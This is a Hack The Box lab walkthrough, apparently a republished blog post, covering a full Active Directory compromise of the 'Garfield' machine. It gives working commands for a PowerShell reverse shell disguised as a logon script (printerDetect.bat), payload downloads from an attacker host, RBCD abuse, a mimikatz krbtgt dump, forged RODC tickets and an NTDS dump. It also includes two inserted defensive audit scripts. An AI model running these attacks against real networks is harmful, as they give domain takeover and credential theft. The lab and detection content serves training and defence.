
[Penetration testing] HTB Season 10 Garfield: full walkthrough

2026-04-11 03:30:01


Garfield


Information gathering

┌──(root㉿kali)-[~]
└─# nmap -A -T4 10.129.83.35
Starting Nmap 7.98 ( https://nmap.org ) at 2026-04-07 00:38 -0400
Nmap scan report for 10.129.83.35
Host is up (0.39s latency).
Not shown: 986 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
53/tcp   open  tcpwrapped
88/tcp   open  tcpwrapped
135/tcp  open  tcpwrapped
139/tcp  open  tcpwrapped
389/tcp  open  tcpwrapped
445/tcp  open  tcpwrapped
464/tcp  open  tcpwrapped
593/tcp  open  tcpwrapped
636/tcp  open  tcpwrapped
2179/tcp open  tcpwrapped
3268/tcp open  tcpwrapped
3269/tcp open  tcpwrapped
3389/tcp open  tcpwrapped
| ssl-cert: Subject: commonName=DC01.garfield.htb
| Not valid before: 2026-02-13T01:10:36
|_Not valid after:  2026-08-15T01:10:36
| rdp-ntlm-info: 
|   Target_Name: GARFIELD
|   NetBIOS_Domain_Name: GARFIELD
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: garfield.htb
|   DNS_Computer_Name: DC01.garfield.htb
|   DNS_Tree_Name: garfield.htb
|   Product_Version: 10.0.17763
|_  System_Time: 2026-04-07T12:49:55+00:00
5985/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).

Host script results:
|_clock-skew: mean: 8h02m28s, deviation: 0s, median: 8h02m28s
| smb2-time: 
|   date: 2026-04-07T12:49:53
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required

TRACEROUTE (using port 53/tcp)
HOP RTT    ADDRESS
1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 591.07 seconds

System: almost certainly Windows Server 2019 / Windows 10 (build 10.0.17763)

Domain environment: domain controller DC01.garfield.htb, DNS domain garfield.htb, NetBIOS domain GARFIELD

A large set of typical Windows domain controller (AD) ports is open:

  • 53: DNS
  • 88: Kerberos
  • 135, 139, 445: RPC / SMB
  • 389, 636: LDAP / LDAPS
  • 464: Kerberos password change
  • 593, 3268, 3269: AD-related services (RPC over HTTP, Global Catalog)
  • 3389: RDP remote desktop
  • 5985: WinRM (HTTP management)

The target is an Active Directory domain controller (DC).

SMB signing is enabled and required, so a conventional SMB relay attack is difficult.

The RDP certificate and the NTLM information leak the hostname, domain name and OS version.

Most ports are filtered by a firewall; only the domain service ports are exposed.

The system clock is roughly 8 hours off from our local clock.

Against the SMB service we can use NetExec with the supplied user credentials to enumerate the SMB shares on the target and list their permissions:

nxc smb 10.129.83.35 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --shares
nxc smb 10.129.83.35 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' --users

We find the users l.wilson and l.wilson_adm.

Next, list every domain object the current user can write to or modify.

Using bloodyAD:

bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' get writable

l.wilson and l.wilson_adm are writable, meaning these two accounts can be modified: resetting the password, changing attributes, adding them to admin groups, and so on.

garfield.htb and _msdcs.garfield.htb also show create-child rights, i.e. the right to create child records in the domain DNS zones. This is the classic in-domain escalation vector: DNS record tampering (ADIDNS / WPAD hijacking).

Try to change the password:

bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' set password l.wilson 'NewPass@123!'

The current user j.arbuckle only holds generic write (WRITE) on the target object CN=Liz Wilson ADM, not the specific password-change right (User-Change-Password).

That route does not work. Our current situation: we are in the garfield.htb domain, we hold the ordinary domain user j.arbuckle, and we have:

  • read access to the SYSVOL share
  • write access to domain users/objects, while the domain contains printer-service-related Group Policy configuration

smbclient //10.129.195.195/SYSVOL -U 'j.arbuckle'
# connect to the SYSVOL share and browse to the scripts directory
cd garfield.htb\scripts
# enter the scripts directory (default location for domain logon scripts)
ls

Write a malicious script into the Group Policy logon-script directory so that domain hosts (including the DC) execute it automatically at logon / service start, giving us a reverse shell.

Exploitation

Generate the PowerShell reverse-shell payload:

echo '$client = New-Object System.Net.Sockets.TCPClient("'"10.10.16.6"'",9001);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){
$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);
$sendback=(iex $data 2>&1|Out-String);
$sendback2=$sendback+"PS "+(pwd).Path+"> ";
$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};
$client.Close()' | iconv -t UTF-16LE | base64 -w0


Build the .bat file:

cat > printerDetect.bat << 'EOF'
@echo off
powershell -NoP -NonI -W Hidden -Exec Bypass -Enc <BASE64_PAYLOAD>
EOF

Upload the batch file:

smbclient //10.129.195.195/SYSVOL -U 'j.arbuckle'

Inside smbclient:
cd garfield.htb\scripts
put printerDetect.bat printerDetect.bat
dir
exit


Trigger it

Give the user Liz Wilson a logon script that runs automatically at sign-in: printerDetect.bat

bloodyAD --host 10.129.195.195 -u 'j.arbuckle' -p 'Th1sD4mnC4t!@1978' \
set object "CN=Liz Wilson,CN=Users,DC=garfield,DC=htb" \
scriptPath -v printerDetect.bat


We get a shell.

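The foothold above combines two weaknesses: a SYSVOL scripts folder that a plain domain user can write to, and write rights on a user object that let the attacker point scriptPath at the uploaded file. The following PowerShell audit is an added defensive example, not code from the original write-up or from any tool it uses. It lists every user whose scriptPath is set, locates the referenced file under the domain's SYSVOL scripts share, records its hash and last-write time, and flags any principal outside an assumed trusted list ($trustedWriters, adjust to your environment) that holds write or delete rights on the file. It assumes the RSAT ActiveDirectory module and read access to \\<domain>\SYSVOL.

```powershell
# Added audit example (not from the write-up): find logon scripts that could be
# tampered with. Read-only; nothing is modified.
Import-Module ActiveDirectory

$domain     = Get-ADDomain
$scriptsDir = "\\$($domain.DNSRoot)\SYSVOL\$($domain.DNSRoot)\scripts"

# Principals that are expected to be able to modify logon scripts (assumption:
# adapt to your GPO admin groups). Anyone else with write/delete rights is flagged.
$trustedWriters = @(
    'NT AUTHORITY\SYSTEM', 'BUILTIN\Administrators', 'CREATOR OWNER',
    "$($domain.NetBIOSName)\Domain Admins",
    "$($domain.NetBIOSName)\Enterprise Admins"
)

# Rights that allow changing or replacing the script. Modify and FullControl
# contain these bits, so they are caught by the bitwise test below.
$writeMask = [System.Security.AccessControl.FileSystemRights]'WriteData, AppendData, Delete'

$findings = foreach ($u in Get-ADUser -Filter 'scriptPath -like "*"' -Properties scriptPath, whenChanged) {
    $path = Join-Path $scriptsDir $u.scriptPath
    $file = Get-Item -LiteralPath $path -ErrorAction SilentlyContinue

    $untrusted = @()
    $lastWrite = $null
    $hash      = $null
    if ($file) {
        $lastWrite = $file.LastWriteTimeUtc
        $hash      = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash
        $untrusted = (Get-Acl -LiteralPath $path).Access |
            Where-Object {
                $_.AccessControlType -eq 'Allow' -and
                ($_.FileSystemRights -band $writeMask) -and
                $trustedWriters -notcontains $_.IdentityReference.Value
            } | ForEach-Object { $_.IdentityReference.Value }
    }

    [pscustomobject]@{
        User             = $u.SamAccountName
        ScriptPath       = $u.scriptPath
        UserObjectChanged = $u.whenChanged   # correlate with Event ID 5136 on scriptPath
        FileExists       = [bool]$file
        FileLastWriteUtc = $lastWrite
        SHA256           = $hash
        UntrustedWriters = ($untrusted -join ', ')
    }
}

# Most recently modified scripts first; a script written minutes before a user
# object change is the pattern to investigate.
$findings | Sort-Object FileLastWriteUtc -Descending | Format-Table -AutoSize
```

Run it from a workstation with the AD module as a reader account. A non-empty UntrustedWriters column, or a script whose hash differs from the last known-good value, is the condition to alert on; pairing this with Directory Service Changes auditing (Event ID 5136 for the scriptPath attribute) catches the object-side half of the technique.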

Lateral movement

We are currently l.wilson; we now want to become l.wilson_adm.

From PowerShell, reset the password of l.wilson_adm:

Set-ADAccountPassword -Identity "l.wilson_adm" -NewPassword (ConvertTo-SecureString 'WhoKnows123!' -AsPlainText -Force) -Reset

Verify WinRM access:

nxc winrm 10.129.195.195 -u 'l.wilson_adm' -p 'WhoKnows123!'

The change succeeded.

Get a shell:

evil-winrm -i 10.129.195.195 -u l.wilson_adm -p 'WhoKnows123!'


Privilege escalation

Information gathering

There is a second domain controller, RODC01.garfield.htb.

Its IP is 192.168.100.2; we are on DC01.garfield.htb with IP 192.168.100.1.

We hold SeMachineAccountPrivilege.

We are also a member of the GARFIELD\Tier 1 group, the administrators of the domain's servers / the RODC.

Add ourselves to RODC Administrators

  • A Tier 1 admin already has management rights over this group and can add themselves directly, with no escalation needed
  • Once a member, we can change the RODC's password replication policy, have it cache domain admin credentials, and take domain controller privileges directly
  • The group is a standard AD admin group; adding members raises no alert by default, which makes it a defensive blind spot

Add-ADGroupMember -Identity "RODC Administrators" -Members "l.wilson_adm"

Port forwarding: set up a tunnel

Deploy the ligolo-ng server on Kali:

# download the tool
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
# extract it
tar -xzf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
# create the TUN interface named ligolo
sudo ip tuntap add user root mode tun ligolo
# bring the interface up
sudo ip link set ligolo up
# start the proxy server listening on 0.0.0.0:11601 with a self-signed certificate
./proxy -selfcert -laddr 0.0.0.0:11601


Run the agent client in the WinRM session

Download the agent from https://github.com/nicocha30/ligolo-ng/releases.

Then transfer it into the WinRM session.

Start an HTTP server on Kali and fetch the binary from the target:

Invoke-WebRequest -Uri "http://10.10.16.9:80/agent.exe" -OutFile "agent.exe"

Run agent.exe:

.\agent.exe -connect 10.10.16.9:11601 -ignore-cert

On Kali:

sudo ip addr add 10.10.16.9/23 dev ligolo
# route the internal subnet through the ligolo TUN interface created above
sudo ip route add 192.168.100.0/24 dev ligolo

In the ligolo interactive console:

# 1. list connected agents (confirm the ID)
ligolo-ng > session
# the output lists the agents; the ID is usually 1

# 2. select the agent by ID (1 here)
ligolo-ng > session 1
# output: [+] Agent selected: 1

# 3. start the tunnel (essential, must be run)
ligolo-ng > start
# output: [+] Tunnel started for agent 1


Reach RODC01:

nxc smb 192.168.100.2 -u l.wilson_adm -p 'WhoKnows123!'

Create a fake account

Now that the user is in the RODC administrators group, create a computer account we control in AD.

Machine accounts in AD hold SeMachineAccountPrivilege by default, can modify their own delegation attributes, and are audited loosely by default, so they are easy to overlook.

impacket-addcomputer garfield.htb/l.wilson_adm:'WhoKnows123!' \
-computer-name 'FAKE$' \
-computer-pass 'FakePass123!' \
-dc-ip 10.129.196.71

Verify it:

nxc ldap 10.129.196.71 -u l.wilson_adm -p 'WhoKnows123!' --users | grep FAKE


Configure RBCD from FAKE$ to RODC01

Set the delegation from the WinRM session:

Set-ADComputer RODC01 -PrincipalsAllowedToDelegateToAccount FAKE$
Get-ADComputer RODC01 -Properties PrincipalsAllowedToDelegateToAccount


RBCD is configured.
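The two steps above (joining a new computer account with impacket-addcomputer, then writing the RODC's PrincipalsAllowedToDelegateToAccount) leave traces an AD reader can query. The PowerShell below is an added defensive example, not code from the write-up or from Impacket; it reports the domain's ms-DS-MachineAccountQuota, lists computer accounts whose mS-DS-CreatorSID shows they were created under that quota by a non-privileged user, and resolves every account that has resource-based constrained delegation configured, marking domain controllers (which should normally have none). It assumes the RSAT ActiveDirectory module and a reader account; it changes nothing.

```powershell
# Added audit example (not from the write-up): machine-account quota and RBCD.
Import-Module ActiveDirectory

$domain = Get-ADDomain

# 1. ms-DS-MachineAccountQuota: with the default of 10, any authenticated user can
#    join computer accounts (like FAKE$) to the domain. 0 closes that path.
$quota = (Get-ADObject -Identity $domain.DistinguishedName `
            -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'
Write-Output "ms-DS-MachineAccountQuota = $quota"
if ($quota -gt 0) { Write-Output "  -> consider setting the quota to 0" }

# 2. Computers created via the quota: mS-DS-CreatorSID is only populated when the
#    creator relied on the quota rather than on a create-child right, so every hit
#    is a machine account a regular user added.
Write-Output "`nComputer accounts created under the quota:"
Get-ADComputer -Filter 'mS-DS-CreatorSID -like "*"' -Properties mS-DS-CreatorSID, whenCreated |
    ForEach-Object {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($_.'mS-DS-CreatorSID', 0)
        $creator = try { $sid.Translate([System.Security.Principal.NTAccount]).Value } catch { $sid.Value }
        [pscustomobject]@{ Computer = $_.Name; Created = $_.whenCreated; CreatedBy = $creator }
    } | Sort-Object Created -Descending | Format-Table -AutoSize

# 3. RBCD: every computer whose msDS-AllowedToActOnBehalfOfOtherIdentity is set,
#    with the principals allowed to delegate to it. A DC or RODC in this list is
#    the configuration the write-up relies on.
$dcObjectDNs = (Get-ADDomainController -Filter *).ComputerObjectDN
Write-Output "Accounts with resource-based constrained delegation configured:"
Get-ADComputer -Filter 'msDS-AllowedToActOnBehalfOfOtherIdentity -like "*"' `
        -Properties PrincipalsAllowedToDelegateToAccount |
    ForEach-Object {
        $allowedFrom = foreach ($dn in $_.PrincipalsAllowedToDelegateToAccount) {
            (Get-ADObject -Identity $dn -Properties sAMAccountName).sAMAccountName
        }
        [pscustomobject]@{
            Target      = $_.Name
            IsDC        = $dcObjectDNs -contains $_.DistinguishedName
            AllowedFrom = ($allowedFrom -join ', ')
        }
    } | Format-Table -AutoSize
```

An entry where IsDC is true, or where AllowedFrom names a computer account that was itself created under the quota, is the combination to investigate; auditing writes to msDS-AllowedToActOnBehalfOfOtherIdentity (Event ID 5136 on computer objects, or 4742 account-changed events) gives the real-time signal that this one-off query does not.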

Impersonate the RODC01 administrator

Request a service ticket:

impacket-getST garfield.htb/'FAKE$':'FakePass123!' \
-spn cifs/RODC01.garfield.htb \
-impersonate Administrator \
-dc-ip 10.129.196.71

Before doing this, synchronise the clock with the DC:

ntpdate 10.129.196.71


Export the ticket:

export KRB5CCNAME=$(pwd)/Administrator@cifs_RODC01.garfield.htb@GARFIELD.HTB.ccache
echo $KRB5CCNAME

Get SYSTEM on RODC01:

impacket-psexec -k -no-pass \
-dc-ip 10.129.196.71 \
-target-ip 192.168.100.2 \
garfield.htb/Administrator@RODC01.garfield.htb


Dump the AES256 key of krbtgt_8245

This prepares the later golden ticket attack.

Host mimikatz over HTTP from Kali:

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe /tmp/
cd /tmp
python3 -m http.server 8888

Download mimikatz onto RODC01:

cd C:\Windows\Temp
certutil -urlcache -split -f http://10.10.16.9:80/mimikatz.exe mimikatz.exe
mimikatz.exe


Inside mimikatz:

privilege::debug
# 1. acquire the debug privilege (must run as SYSTEM, otherwise LSASS memory cannot be read)

lsadump::lsa /inject /name:krbtgt_8245
# 2. inject into the LSASS process and dump the krbtgt account's secrets (/name:krbtgt_8245 targets that account precisely)


AES256: d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240
SID: S-1-5-21-2502726253-3859040611-225969357
RODC number: 8245

Load PowerView in the WinRM session. On Kali:

cd /usr/share/windows-resources/powersploit/Recon/
python3 -m http.server 8888

On the WinRM side (download and load PowerView):

cd C:\Users\l.wilson_adm\Desktop
certutil -urlcache -split -f http://10.10.16.9:80/PowerView.ps1 PowerView.ps1
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\PowerView.ps1
Get-Command *DomainObject*


Set-DomainObject -Identity RODC01$ -Set @{
  'msDS-RevealOnDemandGroup'=@(
    'CN=Allowed RODC Password Replication Group,CN=Users,DC=garfield,DC=htb',
    'CN=Administrator,CN=Users,DC=garfield,DC=htb'
  )
}

Set-DomainObject -Identity RODC01$ -Clear 'msDS-NeverRevealGroup'

Get-ADComputer RODC01 -Properties msDS-RevealOnDemandGroup,msDS-NeverRevealGroup
What each step does:

msDS-RevealOnDemandGroup: the users/groups whose passwords the RODC is allowed to cache. Change: add Administrator to the allow list so the RODC caches the admin's password hash / AES key.
msDS-NeverRevealGroup: the users/groups the RODC must never cache (by default this includes the domain admin groups). Change: clear the attribute to remove the admin "never cache" restriction.
Get-ADComputer: verify the attribute changes. Purpose: confirm the RODC's PRP was modified successfully.


Golden ticket + Keylist attack

Rubeus is a C# Kerberos attack tool for Windows, the "Swiss army knife" of red-team domain work. Its core features include:

  • golden / silver ticket forging
  • ticket extraction (Pass-the-Ticket)
  • ticket passing (Pass-the-Key)
  • AS-REP roasting, Kerberoasting
  • ticket cache manipulation, privilege escalation
  • full domain control in combination with the krbtgt key

On Kali:
wget https://github.com/Flangvik/SharpCollection/raw/master/NetFramework_4.7_x64/Rubeus.exe -O /tmp/Rubeus.exe
cd /tmp
python3 -m http.server 8888

In the WinRM session:

certutil -urlcache -split -f http://10.10.16.9:80/Rubeus.exe Rubeus.exe
dir Rubeus.exe
.\Rubeus.exe

Forge a TGT with Rubeus:

.\Rubeus.exe golden `
/rodcNumber:8245 `
/flags:forwardable,renewable,enc_pa_rep `
/nowrap `
/outfile:ticket.kirbi `
/aes256:d6c93cbe006372adb8403630f9e86594f52c8105a52f9b21fef62e9c7a75e240 `
/user:Administrator `
/id:500 `
/domain:garfield.htb `
/sid:S-1-5-21-2502726253-3859040611-225969357


Then run the keylist attack:

.\Rubeus.exe asktgs `
/enctype:aes256 `
/keyList `
/service:krbtgt/garfield.htb `
/dc:DC01.garfield.htb `
/ticket:ticket_2026_04_10_22_51_40_Administrator_to_krbtgt@GARFIELD.HTB.kirbi `
/nowrap


We get the ticket as base64:

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

Save the base64 locally on Kali as ticket.b64, then clean and decode it:

sed -i 's/^[[:space:]]*//' ticket.b64
tr -d '\r\n\t ' < ticket.b64 | base64 -d > ticket.kirbi


# 1. convert the .kirbi to .ccache with Impacket's ticketConverter
impacket-ticketConverter ticket.kirbi ticket.ccache

# 2. export the environment variable so Impacket tools use this ticket automatically
export KRB5CCNAME=ticket.ccache

# 3. confirm the variable is set
echo $KRB5CCNAME


Dump NTDS with the real Administrator ticket:

nxc smb DC01.garfield.htb --use-kcache --ntds

Finally, log in as Administrator:

evil-winrm -i 10.129.196.71 -u Administrator -H 'ee238f6debc752010428f20875b092d5'



Source: https://www.cnblogs.com/DSchenzi/p/19849166